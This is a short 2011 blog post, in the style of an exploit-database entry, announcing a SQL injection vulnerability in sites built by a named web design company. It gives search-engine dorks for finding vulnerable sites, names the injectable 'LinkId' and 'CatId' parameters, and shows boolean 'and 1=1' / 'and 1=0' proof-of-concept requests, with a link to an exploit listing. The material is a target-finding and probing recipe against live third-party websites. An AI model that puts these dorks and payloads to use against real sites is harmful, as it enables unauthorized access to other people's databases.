Saturday, February 26, 2011

Site Designed by Hypersoft Solutions is Vulnerable to SQL Injection


Title : Site Designed by Hypersoft Solutions is Vulnerable to SQL Injection
Web : http://www.hypersoftsolutions.com/
Found by: p0pc0rn 26/02/2011
Filetype: asp
Dork
: intext:"By: HypersoftSolutions.Com"
: inurl :"cms.asp?LinkId="


SQL
---
http://site.com/cms.asp?LinkId=[SQL]
http://site.com/cms.asp?CatId=[SQL]

POC
---
http://site.com/cms.asp?LinkId=1 and 1=1 TRUE
http://site.com/cms.asp?LinkId=1 and 1=0 FALSE


http://www.1337day.com/exploits/15514

thanks,
-p0pc0rn-
Share:

0 comments: